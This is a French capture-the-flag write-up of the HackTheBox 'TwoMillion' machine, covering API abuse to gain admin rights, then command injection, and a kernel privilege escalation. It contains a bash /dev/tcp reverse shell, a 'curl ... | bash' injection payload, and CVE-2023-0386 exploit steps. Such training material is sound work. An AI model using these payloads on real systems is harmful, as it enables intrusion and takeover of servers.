TwoMillion HackTheBox (WriteUp)

Skills:

Abusing the API to generate a valid invite code
Abusing the API to elevate our privilege to administrator
Command injection via poorly designed API functionality
Information Leakage
Privilege Escalation via Kernel Exploitation (CVE-2023-0386) - OverlayFS Vulnerability

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 10.10.11.221 -oG allPorts

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 2million.htb-oN targeted

Port 80 - HTTP

Découverte de ressources avec Gobuster

gobuster dir -u http://2million.htb/ \
-w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-t 100 -r --exclude-length 1674

Découverte du fichier `inviteapi.min.js`

Ce fichier JavaScript est fortement obfusqué à l’aide de la technique classique eval(function(p,a,c,k,e,d){...}). Après déobfuscation, deux fonctions intéressantes apparaissent :

verifyInviteCode(code) : envoie un code d'invitation à /api/v1/invite/verify
makeInviteCode() : fait une requête à /api/v1/invite/how/to/generate

Exploitation de l’API – Génération d’un code d’invitation

Appel initial :

curl -X POST \
     -H "Content-Type: application/json" \
     http://2million.htb/api/v1/invite/how/to/generate

Réponse

{"0":200,"success":1,"data":{"data":"Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr","enctype":"ROT13"},"hint":"Data is encrypted ... We should probbably check the encryption type in order to decrypt it..."}#

Déchiffrement ROT13 → nouvelle URL :

rot13.comrot13.com

In order to generate the invite code, make a POST request to /api/v1/invite/generate

Requête :

curl -X POST \
     -H "Content-Type: application/json" \
     http://amillion.htb/api/v1/invite/generate

Réponse (base64) :

V1VPSUYtTEs2OFgtSFVHVFctRE9YMVM=

Décodage :

echo "V1VPSUYtTEs2OFgtSFVHVFctRE9YMVM=" | base64 -d; echo

WUOIF-LK68X-HUGTW-DOX1S

Nous utilisons ce code pour créer un compte sur le site.

Exploitation de l'API HACKTHEBOX

Observation de l’API

En visitant /api, on observe les routes disponibles

Tentative de génération de config VPN (échec initial)

curl -v -X POST \
     -H "Content-Type: application/json" \
     --cookie "session=vk54bhldiqdlml8prnse47fkv3" \
     http://2million.htb/api/v1/admin/vpn/generate

Réponse : non autorisé.

Modification de notre rôle via l’API

Nous testons la modification des paramètres utilisateur avec la route :

curl -X PUT \
     -H "Content-Type: application/json" \
     -H "Cookie: PHPSESSID=vk54bhldiqdlml8prnse47fkv3" \
     http://2million.htb/api/v1/admin/settings/update

{"status":"danger","message":"Missing parameter: email"}

curl -X PUT \
     -H "Content-Type: application/json" \
     -H "Cookie: PHPSESSID=vk54bhldiqdlml8prnse47fkv3" \
     http://2million.htb/api/v1/admin/settings/update -d '{"email": "[email protected]"}'

{"status":"danger","message":"Missing parameter: is_admin"}

curl -X PUT \
     -H "Content-Type: application/json" \
     -H "Cookie: PHPSESSID=vk54bhldiqdlml8prnse47fkv3" \
     http://2million.htb/api/v1/admin/settings/update -d '{"email": "[email protected]", "is_admin": 1}'

Réponse :
{"id":15,"username":"Jordan","is_admin":1}

Vérification de notre statut admin

curl -s -X GET \
     -H "Content-Type: application/json" \
     -H "Cookie: PHPSESSID=vk54bhldiqdlml8prnse47fkv3" \
     http://2million.htb/api/v1/admin/auth | jq
{
  "message": true
}

RCE via Injection de Commande

curl -s -X POST \
     -H "Content-Type: application/json" \
     -H "Cookie: PHPSESSID=vk54bhldiqdlml8prnse47fkv3" \
     http://2million.htb/api/v1/admin/vpn/generate -d '{"username": "[email protected]"}'

Tentative d’injection de commande dans le champ username :

curl -s -X POST \
     -H "Content-Type: application/json" \
     -H "Cookie: PHPSESSID=vk54bhldiqdlml8prnse47fkv3" \
     http://2million.htb/api/v1/admin/vpn/generate -d '{"username": "jordan;id #"}'

Reverse Shell

Serveur de fichiers

echo 'bash -i >& /dev/tcp/10.10.14.88/443 0>&1' > index.html
python3 -m http.server 80

Netcat en écoute

nc -nvlp 443

Envoi de la commande

curl -s -X POST \
     -H "Content-Type: application/json" \
     -H "Cookie: PHPSESSID=vk54bhldiqdlml8prnse47fkv3" \
     http://2million.htb/api/v1/admin/vpn/generate -d '{"username": "jordan;curl http://10.10.14.88 | bash"}'

Nous obtenons un shell inversé

Escalade de privilèges

Découverte de fichiers sensibles

En fouillant les fichiers accessibles depuis notre shell, nous découvrons un fichier .env caché contenant des identifiants pour la base de données :

DATABASE=htb_prod
USERNAME=admin
PASSWORD=SuperDuperPass123

Nous repérons également la présence d’un second utilisateur nommé admin.

Réutilisation de mot de passe

En testant les identifiants découverts, nous constatons que l’utilisateur système admin utilise le même mot de passe que celui de la base de données.

Flag user.txt :)

Cette mauvaise pratique nous permet d’obtenir une connexion SSH :

Courriel système

À la connexion, un message nous informe de la présence d’un nouveau mail. En le lisant, on obtient une information cruciale :

Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

Ce message nous met sur la piste d’une vulnérabilité connue dans OverlayFS : CVE-2023-0386 – une faille d’escalade de privilèges locale dans le noyau Linux.

Exploitation de CVE-2023-0386 – OverlayFS Privilege Escalation

OverlayFS permet de superposer des systèmes de fichiers. Dans certaines versions du noyau Linux, une mauvaise gestion des capacités permet à un utilisateur non privilégié d’exécuter du code avec les droits root.

GitHub - puckiestyle/CVE-2023-0386GitHub

Étapes d’exploitation

Cloner l’exploit depuis notre machine locale :

git clone https://github.com/puckiestyle/CVE-2023-0386
cd CVE-2023-0386
make all

Transférer les fichiers compilés vers la machine cible (scp, python -m http.server, etc.).

Sur la machine cible, exécuter dans deux terminaux :

Terminal A :

./fuse ./ovlcap/lower ./gc

Terminal B :

./exp

Si tout se passe bien, nous obtenons un shell root

Flag root.txt :)

Mis à jour il y a 9 mois

hashtagPort 80 - HTTP

hashtagDécouverte de ressources avec Gobuster

hashtagDécouverte du fichier inviteapi.min.js

hashtagExploitation de l’API – Génération d’un code d’invitation

hashtagAppel initial :

hashtagDéchiffrement ROT13 → nouvelle URL :

hashtagRequête :

hashtagExploitation de l'API HACKTHEBOX

hashtagObservation de l’API

hashtagTentative de génération de config VPN (échec initial)

hashtagModification de notre rôle via l’API

hashtagVérification de notre statut admin

hashtagRCE via Injection de Commande

hashtagReverse Shell

hashtagEscalade de privilèges

hashtagDécouverte de fichiers sensibles

hashtagRéutilisation de mot de passe

hashtagFlag user.txt :)

hashtagCourriel système

hashtagExploitation de CVE-2023-0386 – OverlayFS Privilege Escalation

hashtagFlag root.txt :)